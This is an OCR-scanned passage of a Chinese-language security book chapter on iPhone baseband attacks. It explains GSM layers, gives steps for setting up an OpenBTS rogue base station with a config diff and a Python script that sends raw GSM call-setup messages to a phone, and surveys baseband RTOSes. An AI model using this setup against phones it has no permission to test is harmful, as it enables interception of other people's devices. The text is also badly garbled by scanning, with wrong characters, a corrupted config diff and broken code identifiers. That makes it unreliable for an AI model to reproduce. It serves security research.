探索 攻击 者 如 何在 基带 处 理 絮 上 执行 自 定义 代码 。 要 通过 空中 接口 攻击 设备 , 攻击 者 可 能 要 在 足 
够 与 目标 设备 进行 通信 的 距离 内 设置 一 个 流氓 基站 (如 图 11-1 所 示 )。 


人 目标 手机 














11-1 远程 基带 攻击 的 基本 情形 


不 过 基带 攻击 不 一 定 是 远程 攻击 。 在 很 长 一 段 时 间 内 , 驱使 人 们 研究 基带 栈 中 内 存 破坏 的 动 
力 是 解锁 iPhone 的 需求 。 这 是 因为 在 很 多 国家 iPhone 是 以 补贴 价 出 售 的 ， 用 户 在 购买 时 要 与 运营 
商 签订 一 份 与 手机 捆绑 的 长 期 合约 。 这 样 做 的 缺点 在 于 ,捆绑 了 合约 的 iPhone 只 能 使 用 由 出 售 该 
机 的 运营 商 提 供 的 SIM 卡 。 而 这 种 对 SIM 卡 的 检查 ( 也 就 是 所 谓 的 网 络 锁 ) 是 由 该 机 的 基带 处 理 
器 实施 的 。 与 那些 通过 空中 接口 进行 攻击 的 漏洞 相对 应 ， 这 里 要 利用 的 漏洞 破坏 一 般 称 为 本 地 加 
(local ) 漏洞 。 
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本 章 只 关注 通过 GSM 空 中 接口 进行 的 攻击 与 通过 AT 命令 解析 器 进行 的 本 地 攻击 。 虽 然 理 论 上 
讲 针对 CDMA ( Code Division Multiple Address， 码 分 多 址 ) 空中 接口 的 攻击 也 是 可 以 实现 的 ， 但 
是 获得 设置 流氓 CDMA 基 站 所 需 的 硬件 和 软件 要 难得 多 ， 而 有 旦 我 们 并 没有 研究 过 针对 高 通 CDMA 
栈 的 攻击 , 而 且 目 前 也 没有 看 到 别人 公开 过 相关 的 研究 成 果 。 同 样 ， 虽然 UMTS 和 LTE 这 样 的 新 一 
代 蜂 帘 网 络 技 术 提 供 了 丰富 得 多 的 受 攻击 面 ， 但 是 本 章 并 不 会 考虑 针对 这 些 技 术 的 攻击 。 

不 过 在 了 解 所 描述 攻击 的 要 点 之 前 , 我 们 首先 看 一 下 目标 环境 。 就 像 应 用 处 理 器 那样 ， 基带 
处 理 器 也 是 基于 ARM 的 CPU ， 但 并 不 是 运行 iOS ， 而 是 运行 着 一 种 专门 的 RTOS ( Real-Time 
Operating System ， 实 时 操作 系统 )。 不 同型 号 的 iPhone 和 让 Pad 有 着 不 同 的 基带 处 理 器 和 不 同 的 
RTOS。 表 11-1 列 出 了 各 种 型 号 的 设备 及 其 使 用 的 相应 基带 处 理 器 和 RTOS。 


表 11-1 iOS 设 备 中 使 用 的 数字 基带 处 理 器 











































































































处 理 器 使 用 此 芯片 的 设备 RTOS 

英 飞 凌 S-Gold2 (ARM 926 ) iPhone 2G Nucleus PLUS ( Mentor Graphics ) 
英 飞 凌 X-Gold 608 ( ARM 926 ) iPhone 3G/3GS 、iPhone 3G ( GSM ) Nucleus PLUS ( Mentor Graphics ) 
英 飞 闭 X-Gold 618 ( ARM1176 ) iPhone 4 、iPad2 3G (GSM ) ThreadX ( Express Logic ) 
高 通 MDM6600 ( ARM 11356 ) iPhone4(CDMA )iPad23G(CDMA ) REX on OKL4 ( 高通) 
高 通 MDM6610 ( MDM6600 的 变形 ) ”iPhone 4S REX on OKL4 ( 高通) 
注意 事实 上 ， 基带 处 理 器 包含 了 CPU 之 外 的 处 理 单元 一 一 用 于 物理 层 调制 / 解 调 的 DSP。 在 

S-Gold 2 基带 处 理 器 中 , 这 一 DSP 是 Teaklite 核 心 ; 而 表 中 列 出 的 其 他 基带 处 理 器 中 使 用 的 


是 ARM7TDMI 核 心 。 


11.1 GSM 基础 知识 


GSM 是 一 套数 字 蜂 窜 通 信和 标准 。 它 是 在 20 志 纪 80 年 代 由 欧洲 邮电 管理 会 议 (CEPT ) 开发 的 ， 
1992 年 开发 工作 被 移交 给 了 欧洲 电信 标准 化 协会 (ETSI )。GSM 是 第 二 代 移 动 电话 技术 ,被 用 于 
为 200 多 个 国家 和 地 区 的 逾 20 亿 手机 用 户 提供 服务 。 

国际 电信 联盟 (ITU ) 为 GSM 技 术 分 配 了 14 个 不 同 的 频带 ,但 目前 只 用 到 了 其 中 4 个 。 北 美 
地 区 使 用 的 是 GSM-850 和 GSM-1900， 除 南美 和 中 美洲 之 外 的 世界 其 他 地 区 使 用 的 是 GSM-900 和 
GSM-1800， 而 南美 主要 使 用 GSM-850 和 GSM-1900, 但 也 存在 一 些 例外 。 所 有 支持 GSM 的 iOS 设 
备 都 是 同时 支持 GSM-850、GSM-900、GSM-1800 和 GSM-1900 的 四 频 设备 。 不 管 在 什么 位 置 开启 
自己 的 设备 ， 搜 索 信号 时 都 会 搜索 这 4 个 频带 上 的 所 有 信道 。 

现在 来 迅速 剖析 一 下 GSM 协 议 栈 。 在 物理 层 上 ，GSM 使 用 GMSK ( Gaussian Minimum Shift 
Keying， 高 斯 最 小 频 移 键 控 ) 作为 调制 模式 ， 信 道 宽度 是 200 KHz， 比 特 率 大 约 为 270.833 kbit/s。 
它 同时 利用 了 FDMA ( Frequency Division Multiple Address， 频 分 多 址 ) 和 TDMA ( Time Division 
Multiple Address， 时 分 多 址 ) 技术 。 为 了 能 同时 发 送 和 接收 数据 ， 它 用 了 频 分 双 工 (Frequency 
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Division Duplex ) 技术 : 对 于 每 个 频带 来 说 , MS ( Mobile Station , 移动 台 ) 与 BTS ( Base Transceiver 
Station， 基 站 收发 台 ) 之 间 的 传输 都 是 在 用 固定 的 双 工 距离 分 隔 出 的 两 个 不 同 频率 上 实现 的 。 从 
MS 传输 到 BTS 的 数据 是 通过 上 行 链 路 ( uplink ) 发 送 的 ， 对 应 的 相反 方向 则 叫 作 下 行 链 路 
( downlink )。 在 由 TDMA 模 式 定 义 的 物理 信道 上 ， 空 中 接口 的 L1 层 分 布 着 很 多 逻辑 信道 ， 这 些 逻 
辑 信 道 被 映射 到 多 路 复 用 的 物理 信道 上 。 存在 多 种 不 同类 型 的 逻辑 信道 ( 我 们 在 这 里 不 会 深入 介 
绍 )， 而 它们 刚好 可 以 分 成 两 大 类 : 用 于 用 户 数据 传送 的 业务 信道 (traffic channel ) 以 及 在 BTS 
和 MS 间 传送 信 令 信息 (比如 位 置 更 新 ) 的 信 令 信道 ( signaling channel )。 

顺 着 Um 接口 在 GSM 协 议 栈 中 继续 上 行 就 到 达 了 L2 层 一 一 LAPDm 协 议 层 , 它 是 ISDN 的 LAPD 
( Link Access Procedure of D-Channel, DD 信道 链 路 接 入 规程 ，ITU Q.921 ) 的 衍生 物 ， 并 能 让 人 联 
想到 HDLC ( High-Level Data Link Control， 高 级 数据 链 路 控制 )。 在 L2 层 上 传输 的 数据 都 是 经 过 
封装 的 , 要 么 使 用 未 编号 的 信息 帧 ( 如 果 不 需 要 应 答 、 流 控制 和 L2 层 纠 错 ), 要 么 使 用 信息 帧 ( 提 
供 了 肯定 应 答 、 流 控制 和 L2 层 纠 错 )。L2 层 的 CEP ( Connection End Point， 连 接 端点 ) 是 用 所 谓 
的 DLCI ( Data Link Connection Identifier， 数 据 链 路 连接 标识 符 ) 表示 的 ， 而 DLCI 则 是 由 SAPI 
( Service Access Point Identifier， 服 务 接 入 点 标识 符 ) 和 CEPI ( Connection Endpoint Identifier， 连 
接 端 点 标识 符 ) 这 两 部 分 组 成 的 。 

GSM 协 议 栈 的 L3 层 有 3 个 子 层 ,分 别 是 RR ( Radio Resource Management， 无 线 资源 管理 )、 
MM ( Mobility Management， 移 动 性 管理 ) 和 CM ( Connection Management， 连 接管 理 )。RR 层 
负责 在 MS 和 MSC 之 间 建 立 链 路 ， 并 为 此 分 配 和 配置 了 专门 的 信道 MM 层 的 作用 是 处 理 与 设备 
移动 性 有 关 的 各 个 方面 (比如 位 置 管理 ), 还 负责 移动 用 户 的 身份 验证 。 而 CM 层 还 可 以 进一步 分 
为 3 个 不 同 子 层 , 这 3 个 子 层 都 是 平 级 的 , 不 是 上 下 层 肥 的 关系 ,它们 分 别 是 负责 建立 和 拆除 呼叫 
的 CC ( Call Control, 呼叫 控制 ) 子 层 , 以 及 SS ( Supplementary Services, 补充 业务 ) 和 SMS ( Short 
Message Service， 短 消息 服务 )。 后 两 者 是 独立 于 呼叫 之 外 的 。 图 11-2 简 单 展 示 了 基带 处 理 器 上 运 
行 的 蜂 窜 网 络 栈 提供 的 GSM Um 接口 。 
















































































图 11-2”GSM Um 接口 分 层 
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11.2 ”建立 OpenBTS 


近 些 年 来 出 现 了 两 个 开源 项 目 , 它们 开始 构建 用 于 建立 和 运行 GSM 网 络 的 解决 方案 。 这 显著 
降低 了 进行 GSM 安 全 研究 的 参与 成 本 ,其 实 有 人 可 能 会 说 这 也 是 让 一 般 黑 客 能 有 效 执行 基带 攻击 
的 关键 事件 。 虽然 两 个 项 目 一 一 OpenBSC 和 OpenBTS 一 一 的 目标 相似 , 但 它们 采用 了 不 同 的 实现 
方法 。OpenBSC 利 用 既 有 的 商用 GSM 基 站 收发 台 (BTS )， 并 起 到 基站 控制 器 ( BSC ) 的 作用 。 
而 OpenBTS 则 使 用 软件 定义 的 无 线 电 一 一 USRP (Universal Software Radio Peripheral， 通 用 软件 
无 线 电 外 设 ) 平台 ， 完 全 以 软件 方式 运行 GSM 基 站 ( 包括 调制 和 解 调 )。OpenBTS 将 运行 GSM 基 
站 的 硬件 成 本 减少 到 了 2000 美 元 以 下 。 接 下 来 我 们 会 详细 介绍 如 何 自行 构建 用 于 测试 的 小 型 GSM 
网 络 。 





























注意 GSM 是 在 需要 获得 许可 的 频谱 上 运行 的 。 在 没有 取得 当地 监管 部 门 许可 的 情况 下 ， 几 乎 
在 世界 上 任何 一 个 国家 运行 GSM 基 站 都 是 违法 的 。 所 以 在 继续 操作 之 前 ， 请 咨询 自己 的 
法 律 顾问 和 当地 监管 部 门 ， 并 获取 必要 的 许可 。 


11.2.1 ”硬件 要 求 


OpenBTS 使 用 了 软件 定义 无 线 电 的 方式 实现 Um 接口 的 BTS 端 。 要 使 用 OpenBTS 运 行 GSM 网 
络 ， 当 前 需要 使 用 由 Ettus Research 公 司 ( 现 为 美国 国家 仪器 公司 所 有 ) 出 品 的 USRP ( Universal 
Software Radio Peripheral, 通用 软件 无 线 电 外 设 ), 未 来 OpenBTS 还 可 能 文 持 更 多 的 软件 定义 无 线 
电 设 备 。USRP 包 含 了 若干 个 连接 到 FPGA ( Field Programmable Gate Array， 现 场 可 编程 门 阵列 ) 
的 ADC ( Analog-Digital Converter, 模 数 转换 器 ) 和 DAC ( Digital-Analog Converter, 数 模 转换 兢 )。 
根据 具体 的 型 号 ，USRP 可 以 通过 USB 接 口 或 千 兆 以 太 网 接口 与 主机 计算 机 进行 通信 。 实 际 的 射 
据 硬 件 包 含 在 所 谓 的 “ 子 板 ”中 ， 而 子 板 需 要 安装 到 USRP 的 母 板 上 。Ettus 推 出 了 多 种 覆盖 GSM 
正 段 的 收发 器 子 板 ， 即 覆盖 750 MHz 到 1050 MHz 的 RFX900 、 覆 盖 1.5 GHz 到 2.1 GHz 的 RFX1800， 
以 及 覆盖 50 MHz 到 2.2 GHz 的 WBX 板 。 这 些 子 板 都 是 可 以 同时 收发 的 。 不 过 请 注意 ,在 只 使 用 一 
个 子 板 运 行 USRP 的 情况 下 ， 很 容易 出 现 接收 电路 传输 信和 号 泄露 的 情况 ， 这 样 会 大 大 限制 系统 的 
频段 。 推 荐 的 配置 是 用 两 个 RFX 子 板 运行 OpenBTS 。 还 有 一 点 需要 注意 ， 即 可 以 直接 通过 刷新 
EEPROMiFRFX1800 子 板 转换 成 RFX900 子 板 。 不 过 ， 原 生 的 RFX900 子 板 包 含 抑制 900 MHz ISM 
频段 ( 频率 范围 : 902 MHz~928MHz ) 外 信和 号 的 滤波 器 。 因 此 ， 如 果 购 买 了 REFX900 子 板 作为 发 
送 端 ， 你 就 需要 从 子 板 上 务 下 ISM 波 波 器 ， 或 是 限制 自己 使 用 ARFCN (Absolute Radio Frequency 
Channel Number， 绝 对 射频 信道 编号 ) 为 975~988 的 EGSM900 频 段 。 

遗憾 的 是 ，USRP 设 备 的 内 部 时 钟 太 不 精确 了 ， 以 至 于 只 能 保证 最 不 挑 吻 的 手机 可 靠 运 行 。 
此 外 ,我们 不 推荐 为 GSM 把 USRP 运 行 在 64 MHz 的 频率 , 你 应 该 使 用 GSM 比 特 率 的 倍数 ， 从 而 让 
下 采样 更 高 效 。 对 于 GSM 而 言 , 在 手机 中 人 们 通常 会 使 用 13 MHz( GSM 比 特 率 的 48 倍 ) 或 26 MHz 
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的 参考 时 钟 来 达到 这 一 目的 ， 而 USRP 最 常 选择 使 用 52 MHz 的 时 钟 。 不 过 ， 大 家 也 可 以 为 USRP 
提供 外 部 时 钟 信 号 以 解决 这 两 个 问题 。 注意, 为 USRP1 提 供 外 部 时 钟 信号 需要 我 们 对 USRP1 母 板 
进行 重新 计时 的 修改 ， 这 涉及 一 些 表 面 贴 装 焊接 的 工作 。ClockTamer 的 安装 页 面 
( https://code.google.com/p/clock-tamer/wiki/ClockTamerUSRPInstallation ) 上 描述 了 这 些 步骤 。 
ClockTamer 是 一 种 小 型 时 钟 发 生 絮 , 可 以 选用 由 一 家 名 为 FairWaves 的 俄罗斯 公司 生产 的 GPS 同步 
装置 ， 而 且 还 是 个 开源 的 硬件 项 目 。 该 模块 恰好 能 装 和 人 USRP 的 外 壳 中 。 

对 于 较 新 的 USRP( 比如 USRP2 ) 来 说 , 我 们 不 需要 进行 Elx0、N2x0 和 B1x0 重 新 计时 的 修改 ， 
可 以 直接 把 时 钟 信号 提供 给 外 部 时 钟 输入 。 不 过 要 注意 的 是 , 进行 这 些 操作 需要 支持 UHD 设 备 的 
OpenBTS 版 本 。 


























注意 OpenBTS 2.8 及 之 后 版 本 默认 支持 UHD 设 备 ， 但 OpenBTS 2.6 默 认 不 支持 。 大 家 可 以 在 
https://github.com/ttsou/openbts-uhd 找 到 支持 UHD 设 备 的 OpenBTS 2.6 分 支 。 


11.2.2 ”OpenBTS 的 安装 和 配置 


我 们 在 这 里 要 向 大 家 展示 如 何 安装 OpenBTS 并 设置 用 于 开设 恶意 基站 的 最 小 配置 。 本 书 的 
随 书 材料 (www.wiley.comy/go/ioshackershandbook ) 包含 一 个 VirtualBox 镜 像 ， 在 首次 引导 时 会 
安装 以 52 MHz 时 钟 运行 USRP1 所 需 的 依赖 文件 ， 然 后 就 可 以 作为 测试 基带 攻击 的 完备 测试 环境 
使 用 了 。 

下 面 是 OpenBTS 2.6 发 布 版 中 的 示例 配置 以 及 本 章 随 后 使 用 的 配置 之 间 的 统一 区 别 : 


--- OpenBTS.config.example 2012-03-12 11:20:43.993739075 +0100 
+++ OpenBTS.config 2012-03-12 11:31:27.029729225 +0100 
@@ -30,3 +30,3 @@ 
The initial global logging level: ERROR, WARN, NOTICE, INFO, DEBUG, DEEPDEBUG 
-Log.Level NOTICE 
+LOog.Level INFO 
Logging levels can also be defined for individual source files. 
@@ -86,4 +86,4 @@ 
YOU MUST HAVE A MATCHING libusrp AS WELL!! 
-TRX.Path ../Transceiver/transceiver 
TRX.Path ../Transceiver52M/transceiver 
TRX.Path ../Transceiver/transceiver 
TRX.Path ../Transceiver52M/transceiver 
static TRX.Path 
@ -182,3 +182,3 @@ 
Things to query during registration updates. 
-#Control .LUR.QueryIMEI 
+Control .LUR.QueryIMEI 
Soptional Control .LUR.QueryIMEI 
@@ -197,3 +197,3 @@ 
# Maximum allowed ages of a TMSI, in hours. 
-Control.TMSITable.MaxAge 72 
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+Control.TMSITable.MaxAge 24 


@@ -259,3 +259,3 @@ 

Location Area Code, 0-65535 

-GSM.LAC 1000 

+GSM.LAC 42 

Cell ID, 0-65535 

@@ -286,5 +286,5 @@ 

Valid ARFCN range depends on the band. 

-GSM.ARFCN 51 

GSM.ARFCN 51 

ARCN 975 is inside the US ISM-900 band and also in the GSM900 band. 
-#GSM.ARFCN 975 

+GSM.ARFCN 975 

ARFCN 207 was what we ran at BM2008, I think, in the GSM850 band. 
@@ -295,3 +295,3 @@ 

Should probably include our own ARFCN 

-GSM.Neighbors 39 41 43 

GSM.Neighbors 39 41 975 

GSM.Neighbors 207 


请 根据 得 到 使 用 权限 的 频率 小 心 调整 GsSM.ARECN、GSM.Band 和 GSM.Neighbours。 

注意 ， 默 认 情 况 下 大 家 是 在 开放 配置 (open configuration ) 下 运行 OpenBTS 的 ， 这 意味 着 任 
何 试图 注册 到 该 测试 网 络 的 移动 设备 都 会 被 许可 和 网。 这 样 会 带 来 不 必要 的 副作用 , 特别 是 在 没 
有 适当 限制 传输 功率 和 (或) 处 在 其 他 网 络 只 有 微弱 信号 的 情况 下 时 。 设备 可 能 在 不 经 意 间 就 漫 
游 到 大 家 设置 的 测试 网 络 。 为 避免 这 种 情况 ， 大 家 可 以 用 封闭 配置 (closed configuration ) 运行 
OpenBTS ， 要 求 每 个 IMSI ( International Mobile Subscriber Identification Number， 国 际 移动 用 户 识 
别 码 ) 都 注册 到 Asterisk。 

在 连接 了 硬件 后 ,你 就 应 该 执行 简单 的 检查 ,看 看 一 切 是 否 设置 正确 。 对 于 本 测试 ， 大 家 可 
以 使 用 testcall 功 能 ， 而 且 之 后 还 可 以 利用 它 传输 原始 的 GSM L3 层 消息 。 首 先 ， 我们 要 安装 
libmich 库 ( https://github.com/mitshelMlibmich; 如 果 使 用 我 们 提供 的 虚拟 机 ， 则 不 需要 这 一 步 )， 
它 的 作用 是 利用 Python 接口 创建 L3 层 消息 。 接 着 ， 启 动 OpenBTS 并 将 自己 的 iPhone 注册 到 测试 网 
络 。 若 要 选择 该 测试 网 络 ， 请 在 “设置 ”应 用 的 “运营 商 ” 选 项 中 禁用 自动 选择 ， 并 手动 选择 
为 00101 的 移动 网 络 。 

如 果 看 不 到 测试 网 络 或 是 没 法 注册 到 测试 网 络 ， 你 可 以 先 把 iPhone 设置 成 飞行 模式 ， 至 少 持 
续 5 s 时 间 ， 然 后 关闭 飞行 模式 ， 并 再 次 执行 网 络 选择 过 程 ， 大 家 的 让 hone 现 在 会 执行 完全 扫 摘 。 

在 注册 到 网 络 之 后 ， 你 就 可 以 模拟 呼叫 建立 的 第 一 个 阶段 。 利 用 如 下 命令 设置 通 向 iPhone 的 
业务 信道 : 

OpenBTS> tmsis 


TMSI IMSI IMEI (SV) age used 
Ox4f5e0ccc 262XXXXXXXXXXXX O01XXXXXXXXXXXXXX 293s 和 人 3 





本 


+ 






















































































1 TMSIs in table 
OpenBTS> testcall 262XXXXXXXXXXXX 60 
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OpenBTS> calls 

1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 0Q.931State=active 
SIPState=Null (2 sec) 

1 transactions in table 


在 上 面 的 例子 中 ，tmsis 命 令 会 显示 已 注册 iPhone 的 TMSI ( Temporary Mobile Subscriber 
Identitiy， 临 时 移动 用 户 识 别 码 ) 以 及 与 之 对 应 的 IMSI ( International Mobile Subscriber Identity， 
国际 移动 用 户 识别 码 )、IMEISV ( International Mobile Equipment Identity and Software Version ， 
际 移动 设备 识别 码 及 软件 版 本 ), 还 列 出 初次 注册 的 时 间 以 及 最 近 一 次 使 用 的 时 间 。 而 testcall 
命令 会 打开 一 个 UDP 套 接 字 ( 默认 在 28670 端 口上 ) 和 通 向 具有 第 二 个 参数 所 示 IMSI 的 移动 设备 
的 业务 信道 。 这 样 就 可 以 向 该 UDP 端口 发 送 数据 报 ， 这 些 数据 报 会 作为 GSM L3 层 数据 包 被 转发 
到 移动 设备 ， 反 之 亦 然 。 任 何 时 候 都 只 能 有 一 个 testcall 实 例 处 于 活动 状态 。 想 知道 建立 了 哪 
个 呼叫 ， 大 家 可 以 使 用 calls 命 令 。 

然后 ， 我 们 就 要 在 另 一 个 终端 运行 如 下 Python 脚本 ， 模 拟 呼叫 的 建 

import socket 


import time 
from libmich.formats import * 

















全 





TESTCALL_ PORT = 28670 





tcsock = socket.socket (socket.AF_INET, socket.SOCK_ DGRAM) 
tcsock.sendto(str(L3Mobile.SETUP()), ('127.0.0.1', TESTCALL PORT)) 


在 执行 该 脚本 之 后 ， 大 家 的 Phone 就 应 该 响起 铃声 了 。 注 意 ， 在 发 送 了 初始 的 呼叫 建立 消息 
后 ,大 家 并 未 继续 进行 状态 转换 ， 因 此 手机 在 响 铃 时 会 出 现 假死 状态 。 如 果 测 试 成 功 的 话 ， 你 只 
要 把 OpenBTS 关 掉 就 行 了 。 

封闭 配置 和 Asterisk 拨 号 规则 

大 家 在 前 面 的 描述 中 不 必 配 置 Asterisk， 因 为 是 在 开放 配置 下 运行 OpenBTS 的 。 如 果 想 要 在 
封闭 配置 下 运行 OpenBTS ， 或 是 想 要 在 多 个 注册 到 测试 网 络 的 设备 间 进 行 呼叫 ， 你 就 至 少 要 对 
Asterisk 进 行 一 些 基本 配置 。 大 家 最 起 码 要 把 下 面 这 几 行 追加 到 默认 的 extensions.conf 文 件 中 : 

[sip-openbts] 


exten => 6666,1,Dial (SIP/IMSI2620XXXXXXXXX) 
exten => 7777,1,Dial (SIP/IMSI2620YYYYYYYYYYY) 


并 把 下 面 几 行 追加 到 默认 的 sip.conf 文 件 中 : 


[IMSI2620XXXXXXXXXXX] 
callerid=6666 
canreinvite=no 
type=friend 
context=sip-openbts 
allow=gsm 
host=dynamic 















































[IMSI2620YYYYYYYYYY] 
callerid=7777 








图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 


276 第 11 章 基带 攻击 





canreinvite=no 
type=friend 
context=sip-openbts 
allow=gsm 
host=dynamic 


请 确保 sip.conf 和 extensions.conf 的 上 下 文 和 IMSI 标 识 符 都 是 相互 匹配 的 。 
11.3 ”协议 栈 之 下 的 RTOS 


当今 智能 手机 的 蜂窝 基带 可 视 作 一 个 独立 的 子 系统 , 它 在 自己 具有 专用 协 处 理 器 ( 例如 DSP、 
cryptoO 和 3G 协 处 理 右 ) 的 处 理 器 上 运行 着 自 有 的 操作 系统 , 而 这 有 助 于 满足 蜂窝 通信 的 实时 需求 。 
因此 ， 运 行 在 蜂 帘 协 议 栈 ( cellular stack ) 之 下 的 操作 系统 是 专门 的 实时 操作 系统 ， 有 时 甚至 是 
基带 协议 栈 (baseband stack ) 供应 商 专 有 的 一 一 比如 高 通 的 REX。 不 过 更 常见 的 情况 是 ， 蜂 窜 协 
议 栈 的 所 有 者 会 在 运行 其 蜂窝 协议 栈 的 设备 上 发 放 商 用 OS 许可 。 这 些 操 作 系 统 的 主要 任务 是 有 
效 并 带 有 实时 约束 地 管理 处 理 器 、 内 存 和 所 连接 设备 之 类 的 资源 , 这 往往 让 它们 看 似 与 桌面 操作 
系统 有 着 天 壤 之 别 ， 但 其 实 并 非 如 此 。 

接 下 来 我 们 简要 阐述 在 不 同型 号 的 OS 设备 中 使 用 的 3 种 实时 操作 系统 ,并 介绍 每 种 操作 系统 
中 任务 /线程 控制 、 任 务 /线程 间 通 信和 锁 机 制 、 内 存 管理 和 内 存 保护 的 工作 原理 
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11.3.1 Nucleus PLUS 


Nucleus PLUS 是 由 Mentor Graphics 公 司 推出 的 一 种 被 广泛 使 用 的 商用 RTOS， 它 以 源 代码 形 
式 提 供给 付费 获得 使 用 许可 的 人 。S-Gold 2 和 X-Gold 608 基 带 都 使 用 了 Nucleus PLUS 。 不 巧 的 是 ， 
目前 没有 有 关 Nucleus PLUS 的 好 文档 公开 ， 不 过 官方 手册 已 经 泄露 了 。 

Nucleus PLUS 中 的 执行 单元 称 为 任务 。 这 些 任务 可 以 动态 地 创建 和 删除 , 并 以 在 任务 创建 时 
定义 的 优先 级 运行 。 对 于 每 个 优先 级 来 说 , 处 于 该 级 别 的 所 有 任务 都 是 以 轮 询 方式 调度 时 间 片 运 
行 的 ， 它 们 还 可 能 直接 让 出 处 理 器 。 不 管 是 全 局 范围 还 是 在 各 个 任务 中 ， 抢 占 都 是 不 被 允许 的 。 
ISR ( Interrupt ServiceRoutine， 中 断 服 务 例 程 ) 是 多 种 不 同 的 执行 单元 。 来 看 几 种 不 同类 型 的 ISR 
间 的 区 别 。 第 一 类 是 用 户 ISR， 它 们 不 能 使 用 Nucleus PLUS 服务 ， 而 且 需 要 自行 保存 和 恢复 所 使 
用 的 寄存 器 。 它 们 是 直接 捆绑 到 中 断 向 量 的 ， 而 且 未 通过 Nucleus PLUS 注册 。 接 下 来 是 低级 ISR 
(LISR, 第 一 级 中 断 处 理 程序 ) 和 高 级 ISR ( HISR, 第 二 级 中 断 处 理 程序 )。 LISR 只 具有 对 Nucleus 
PLUS 服务 的 有 限 访问 权 , 并 且 是 捆绑 到 中 断 向 量 的 , 而 HISR 的 调度 方式 与 任务 的 调度 方式 类 似 ， 
并 可 以 调用 大 多 数 的 Nucleus PLUS 服 务 。 

Nucleus PLUS 的 内 存 分 配 也 分 两 种 形式 : 分 区 内 存 (partition memory ) 和 动态 内 存 ( dynamic 
memory )。 这 两 种 内 存 都 是 在 内 存 池 中 进行 管理 的 ， 而 内 存 池 需 要 在 分 配 内 存 之 前 事先 定义 。 在 
没 法 立即 执行 内 存 分 配 时 , 任务 是 可 以 暂停 的 , 这 样 就 会 让 任务 一 直 等 待 ， 直到 有 大 小 合适 的 内 
存 块 变 为 空闲 。 分 区 内 存 每 次 分 配 的 都 是 固定 大 小 的 内 存 块 , 每 次 调用 分 配 函 数 都 会 从 内 存 池 中 
获得 一 个 大 小 刚好 为 该 固定 值 的 内 存 块 。 这 种 内 存 管理 方式 在 存在 实时 约束 的 垦 入 式 系 统 中 十 分 
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常见 ， 因 为 这 让 内 存 分 配 可 以 在 恒定 的 执行 时 间 内 发 生 。 此 外 ,分 区 内 存 的 空间 利用 率 更 高 ， 因 
为 不 需要 为 内 存 块 存 储 分 配 元 数据 。 动 态 内 存 则 人 允许 从 内 存 池 中 分 配 大 小 可 变 的 内 存 , 类 似 于 党 
规 的 malloc () 实现 。( 请 参阅 11.3.4 节 以 了 解 堆 实 现 的 内 情 。) 

对 于 任务 的 同步 和 互 斥 而 言 ， 要 用 到 信和 号 量 。Nucleus PLUS 实现 的 信和 号 量 都 是 计数 信和 号 量 。 

NucleusPLUS 中 存在 多 种 任务 间 通 信 方 式 。 大 家 可 以 动态 创建 和 删除 邮箱 。 它 们 是 最 原始 的 
数据 传输 方式 。 每 个 邮箱 都 只 能 存放 一 条 刚好 由 4 个 32 位 字 构 成 的 消息 。 管 道 和 队列 则 是 功能 
强大 的 原 语 。 这 样 大 家 就 可 以 发 送 由 字 节 ( 管道 ) 或 32 位 字 ( 队列 ) 构成 的 多 条 消息 了 。 创建 的 
管道 和 队列 既 可 以 是 变 长 的 , 也 可 以 是 定 长 的 ， 其 类 型 在 创建 时 定义 。 消 息 是 按 值 ( 而 不 是 按 引 
用 ) 收 发 的 , 我 们 可 以 对 消息 进行 广播 , 而 且 等 着 对 队列 接收 消息 的 任务 会 苏醒 并 接收 这 些 消息 。 

Nucleus PLUS 所 支持 的 任务 间 信 令 与 同步 机 制 还 包括 事件 组 和 信号 , 不 过 它们 只 占用 了 极为 
有 限 的 带宽 。 






































11.3.2 ThreadX 


ThreadX 与 Nucleus PLUS 同宗 同 源 , 这 两 种 操作 系统 都 是 由 软件 工程 师 William Lamie 编 写 的 。 
像 Nucleus 那 样 ，ThreadX 也 是 以 源 代码 的 形式 分 发 给 获得 使 用 许可 的 人 ， 但 它 是 由 Express Logic 
公司 提供 的 。 与 Nucleus PLUS 相 比 ，ThreadX 的 API 复 杂 度 显著 降低 ,而且 中 断 体系 得 到 了 彻底 的 
革新 。 与 本 章 描 述 的 其 他 实时 操作 系统 不 同 ，Edwards C. Lamie 扎 写 了 一 本 有 关 ThreadX 的 好 书 
Real-Time Embedded Multithreading: Using ThreadX and ARM ( 1578201349，CMP，2005 年 出 版 )， 
详细 介绍 了 ThreadX 的 实现 。 因 为 ThreadX 与 Nucleus PLUS 有 着 密切 关系 , 所 以 我 们 在 本 章 中 对 它 
就 不 作 歼 述 了 。 


























11.3.3 REX/OKL4/lguana 


REX ( Real-time Executive System， 实 时 执行 系统 ) 是 由 高 通 公 司 为 其 MSM ( Mobile Station 
Modem, 移动 台 调 制 解 调 右 ) 系列 产品 开发 的 实时 操作 系统 。 运行 在 MDM66x0 系 列 芯 片上 的 AMSS 
(Advanced Mobile Subscriber Software， 高 级 移动 用 户 软 件 ) 采用 了 该 实时 操作 系统 。 从 2006 年 末 开 
始 ， 高 通 公司 为 其 蜂 帘 协 议 栈 带 来 了 一 项 重大 创新 :在 REX 的 支撑 下 L4 衍 生 的 微 内 核 一 一 OKL4。 
好 在 某 些 版 本 的 OKL4 是 以 源 代码 的 形式 免费 提供 的 ， 这 大 大 简化 了 对 AMSS 的 分 析 。 

OKL4 仅 仅 是 该 系统 的 微 内 核 。 而 操作 系统 中 诸如 虚拟 内 存 管理 和 进程 管理 之 类 的 重要 功能 
都 是 由 L4 服 务 器 Iguana 实 现 的 ， 而 它 的 源 代 码 也 是 免费 提供 的 。Iguana 和 L4 的 执行 单元 是 线程 。 
事实 上 ，Iguana 线 程 就 是 L4 线 程 ， 而 且 可 以 通过 L4 API 和 Iguana API 来 操控 。 

Iguana 使 用 了 单一 地 址 空间 ， 让 数据 共享 变 得 很 有 效率 ， 而 且 它 为 每 个 进程 引入 了 保护 域 以 
实施 其 安全 策略 。 保 护 域 可 视 作 等 同 于 传统 操作 系统 中 的 进程 ， 它 定义 了 进程 可 以 访问 的 资源 。 

内 存 段 (memory section ) 是 相 邻 的 虚拟 页 面 , 它们 是 Iguana 中 虚拟 内 存 分 配 和 保护 的 基本 单 
元 。 内存 段 是 利用 memsection_create() 创 建 的 , 既 可 以 在 引导 时 创建 , 也 可 以 在 运行 时 创建 。 

OKL4/Iguana 与 本 章 中 讨论 的 其 他 实时 操作 系统 之 间 存 在 一 个 显著 差异 ， 即 只 有 操作 系统 是 
